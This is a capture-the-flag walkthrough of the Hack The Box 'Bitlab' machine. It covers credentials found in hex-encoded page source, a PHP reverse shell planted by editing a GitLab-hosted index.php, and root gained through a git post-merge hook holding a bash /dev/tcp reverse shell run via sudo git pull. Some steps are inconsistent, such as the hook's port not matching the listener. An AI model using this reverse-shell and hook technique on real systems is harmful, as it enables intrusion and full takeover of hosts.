Hack The Box Bitlab is a medium-difficulty Linux machine. There are a couple of ways to exploit this machine. I’m going to use the intended one. The other way involved good old OllyDBG which I honestly don’t like 🙂

I’ve added the machine IP 10.10.10.114 to etc/ hosts as bitlab.htb. Let’s start with nmap port scan -a mandatory step to start with any machine.

Here is the nmap scan results:

 ⚡ ⚙ root@ns09~/htb/bitlab nmap -p- -sT -sV -sC -oN initial-scan bitlab.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 09:24 +03
Nmap scan report for bitlab.htb (10.10.10.114)
Host is up (0.15s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
|   256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_  256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open  http    nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://bitlab.htb/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 371.91 seconds
 ⚡ ⚙ root@ns09~/htb/bitlab 

Namp reports there are only 2 ports open. Port 80 and a Nginx webserver and Port 22. Since the port 22 needs credentials to log in to the machine, so I proceed to see what’s running in the port 80.

The Nginx on port 80 hots GitLab Community Edition. (A web-based DevOps lifecycle tool that provides a Git-repository manager providing wiki, issue-tracking and CI/CD pipeline features, using an open-source license. ref: Wikipedia).

As the GitLab page needs credentials to log in, I’m proceeding to find other ways to exploit. Some HTB users in the forum suggested to go GoBuster, but I found an easy way to find the directory using robots.txt. The sites robots.txt has revealed a lot of directories that disallowing search engines.

Getting The Credentials

I checked though the different directlries one by one. I found some interesting HEX withon the directory /help’s source-code:

The last part of the source-code is an encoded GitLab login script that contains user name and password. After decoding the hex using http://ddecode.com/hexdecoder/ I now have the valid username and password of the page. clave:11des0081x

Uisng the credentials I obtained, I successfully logged-in to the BitLab page. The page contains few code repositories. lets go through it.

The Good Old PHP Reverse Shell

So looking through the code repository, I noticed the user “Clave” is able to edit the profile index.php file. This is great news for me, I can make a reverse shell using the modified index.php file. For that, I need my good old friend PenTestMonkey’s PHP Reverse shell. I’m going to copy the script and modify it to add my local IP and port to call the shell back from my Kali machine.

And I replaced my reverse shell script with the GitLab’s index.php script. Then, clicked on “Commit Changes” button. I made sure my updates has been went through. I made a merge request to finsh the update.

Getting the Reverse Shell

Once the process is done, I setup my listener nc -nlvp 4444. I opened the page i just updated. (http://bitlab.htb/profile/index.php)

I’m ready to go, I have the reverse shell. However, the shell I have is www-data with low privilage, I had to run

 ⚡ ⚙  root@ns09~/htb/bitlab nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.114.
Ncat: Connection from 10.10.10.114:48594.
Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 11:12:47 up  5:01,  0 users,  load average: 0.10, 0.10, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@bitlab:/$ 

I ran the sudo -l command to see the better visibility

www-data@bitlab:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on bitlab:
    env_reset, exempt_group=sudo, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bitlab:
    (root) NOPASSWD: /usr/bin/git pull
www-data@bitlab:/$ 

However, I wasn’t able to perform anything since I have a low privilege shell. After browsing the site for a while, I noticed that there is a snipped has a PHP code that would help me to get DB user credentials. I would need to modify the PHP code in order to achieve this.

From this:

To this:

Code:

<?php
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
$result = pg_query($db_connection, "SELECT * FROM profiles");

while ($row = pg_fetch_row($result)) {
  var_dump($row);
}
?>

Getting the user.txt

And update my index.php and browse the page again.

I have the db password in encoded format. I’d need to decode it before I ssh the box.

string(1) “1” [1]=> string(5) “clave” [2]=> string(22) “c3NoLXN0cjBuZy1wQHNz==” }

I used kali decoder to decode the hash. The password was ssh-str0ng-p@ss

I went on ssh the box using clave as the user. I tried the password as ssh-str0ng-p@ss, unfortunately, it didn’t work, I tried the password ssh-str0ng-p@ssbase64 it didn’t work also, but it worked when I use hashed password as a password it worked. and I got the user.txt.

 ⚡ root@ns09~/htb/bitlab ssh clave@10.10.10.114
The authenticity of host '10.10.10.114 (10.10.10.114)' can't be established.
ECDSA key fingerprint is SHA256:hNHxoptKsWqkzdME7Bfb+cGjskcAAGySJazK+gDDCHQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.114' (ECDSA) to the list of known hosts.
clave@10.10.10.114's password: 
Permission denied, please try again.
clave@10.10.10.114's password: 
Last login: Thu Aug  8 14:40:09 2019
clave@bitlab:~$ ls
RemoteConnection.exe  user.txt
clave@bitlab:~$ cat user.txt
1e3f[------------]8154
clave@bitlab:~$ 

Privilege escalation

From my previous reverse shell, I will perfom a git-pull so that I can execute git pull as root. I will have to create a writable folder where I will copy the git, as per thr forum, this can be done in the subdirectory of /tmp directory.

User www-data may run the following commands on bitlab:
    (root) NOPASSWD: /usr/bin/git pull

I ran the following commands:

$ cd /tmp
$ mkdir nav1n
$ cd nav1n
$ cp -rf /var/www/html/profile .
$ cd profile

After the copying is done, my next step is to create a hook called post-merge which will be executed once the code has been pulled in to nav1n directory. Also, I need to change the directory permission to executable with chmod +x.

Here are the commands I ran.

$ echo "#!/bin/bash" > .git/hooks/post-merge
$ echo "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1" >> .git/hooks/post-merge
$ chmod +x .git/hooks/post-merge
$ ls -alh .git/hooks
total 60K
drwxr-xr-x 2 www-data www-data 4.0K Nov 21 12:38 .
drwxr-xr-x 8 www-data www-data 4.0K Nov 21 12:39 ..
-rwxr-xr-x 1 www-data www-data  478 Nov 21 12:38 applypatch-msg.sample
-rwxr-xr-x 1 www-data www-data  896 Nov 21 12:38 commit-msg.sample
-rwxr-xr-x 1 www-data www-data 3.3K Nov 21 12:38 fsmonitor-watchman.sample
-rwxrwxrwx 1 www-data www-data   53 Nov 21 12:42 post-merge
-rwxr-xr-x 1 www-data www-data  189 Nov 21 12:38 post-update.sample
-rwxr-xr-x 1 www-data www-data  424 Nov 21 12:38 pre-applypatch.sample
-rwxr-xr-x 1 www-data www-data 1.7K Nov 21 12:38 pre-commit.sample
-rwxr-xr-x 1 www-data www-data 1.4K Nov 21 12:38 pre-push.sample
-rwxr-xr-x 1 www-data www-data 4.8K Nov 21 12:38 pre-rebase.sample
-rwxr-xr-x 1 www-data www-data  544 Nov 21 12:38 pre-receive.sample
-rwxr-xr-x 1 www-data www-data 1.5K Nov 21 12:38 prepare-commit-msg.sample
-rwxr-xr-x 1 www-data www-data 3.6K Nov 21 12:38 update.sample
$ cat .git/hooks/post-merge
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.9/4444 0>&1
$ sudo git pull
From ssh://localhost:3022/root/profile
   master     -> origin/master
 * [new branch]      patch-2603 -> origin/patch-2603
Updating ccf9eff..6c6f8a7
Fast-forward
 index.php |   2 +-
 1 file changed, 2 insertions(+), 0 deletions(-)

In the meantime I ran a listener on the port 6666 in another terminal.

 ⚡root@ns09~/htb/bitlab nc -nlvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Connection received on 10.10.10.114 36176
bash: cannot set terminal process group (1122): Inappropriate ioctl for device
bash: no job control in this shell
root@bitlab:/tmp/nav1n/profile# cat /root/root.txt
cat /root/root.txt
8d4c[--------------]d587c